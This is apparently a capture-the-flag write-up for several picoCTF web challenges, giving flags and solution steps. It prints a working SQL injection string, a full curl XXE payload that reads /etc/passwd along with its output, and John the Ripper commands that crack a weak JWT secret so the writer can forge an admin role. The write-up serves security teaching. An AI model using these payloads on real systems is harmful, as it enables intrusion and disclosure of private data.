findme - 100 pts

 

Description

Help us test the form by submitting the username as test and password as test!

Approach

After logging in to the page using the provided credentials, we were instantly redirected to two pages that appeared to be named in Base64 encoding. I used BurpSuite to intercept and forward both requests individually, which allowed me to capture the flag.

Untitled

Untitled

 

Flag: picoCTF{proxies_all_the_way_df44c94c}

 

 

MatchTheRegex - 100 pts

 

Description

How about trying to match a regular expression

Approach

For this one we have to write a regular expression that matches the flag pattern: picoCTF.*

Untitled

 

Flag: picoCTF{succ3ssfully_matchtheregex_08c310c6}

 

 

More SQLi - 200 pts

 

Description

Can you find the flag on this website.

Approach

we can see the SQL query being made in response

Untitled

This simple SQLi Payload works: ‘ OR 1=1 --

Untitled

 

Flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}

 

 

SOAP - 100 pts

 

Description

The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?

Approach

Upon inspecting the page’s source code, we discovered that there is an endpoint named “/data” that uses XML, as indicated by the corresponding JavaScript file. This suggests that the application may be vulnerable to XML External Entity (XXE) attacks.

Untitled

I sent this payload using curl and got the flag

┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ curl -X POST -H "Content-Type: application/xml" 
-d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE 
data [ <!ENTITY test SYSTEM "file:///etc/passwd" > ]> 
<data><ID>&test;</ID></data>' http://saturn.picoctf.net:53312/data

Invalid ID: root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt❌100:65534::/nonexistent:/usr/sbin/nologin
flask❌999:999::/app:/bin/sh
picoctf❌1001:picoCTF{[email protected]_3nt1t1ty_e5f02dbf}

 

Flag: picoCTF{[email protected]_3nt1t1ty_e5f02dbf}

 

 

Java Code Analysis!?!

 

Description

BookShelf Pico, my premium online book-reading service.I believe that my website is super secure. I challenge you to prove me wrong by reading the ‘Flag’ book!Here are the credentials to get you started:

  • Username: “user”
  • Password: “user”

Source code can be downloaded here

Approach

Upon logging in with the provided credentials, users are assigned the free user role. The website offers three types of user roles: free, premium, and admin. Only users with the admin role have access to the flag book.

Untitled

Based on the given hints, it appears that the website is using JWT for user authentication. With this information, we can check whether it is possible to modify our user role to become an admin.

To get the authentication token, we can inspect the cookies using the Chrome Developer Tools.

Untitled

jwt.io can be used to decode the token and potentially modify its contents.

abc.png

In order to modify the JWT, we would need to have the secret key used to sign it. If the secret key is not sufficiently complex, it may be possible to crack it using a tool like John the Ripper. In this particular case, John the Ripper was able to crack the key in under a second because the key was a simple one - ‘1234’.

┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoi
RnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY4MjU0NjM2OCwiaWF
0IjoxNjgxOTQxNTY4LCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9.au2F6
GtDI5Zoq9ihgltHoYBKbrvutqViF2A0QalxNTw" > jwt.txt


┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ john jwt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
1234             (?)     
1g 0:00:00:00 DONE 2/3 (2023-04-19 18:01) 50.00g/s
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now that we have obtained the secret key, we can modify the token to change our user role to admin. Once we have made the necessary changes, we can load the modified token into the local storage using the inspect tool.

Untitled

After loading the modified token into the local storage, we can simply refresh the page to get the flag.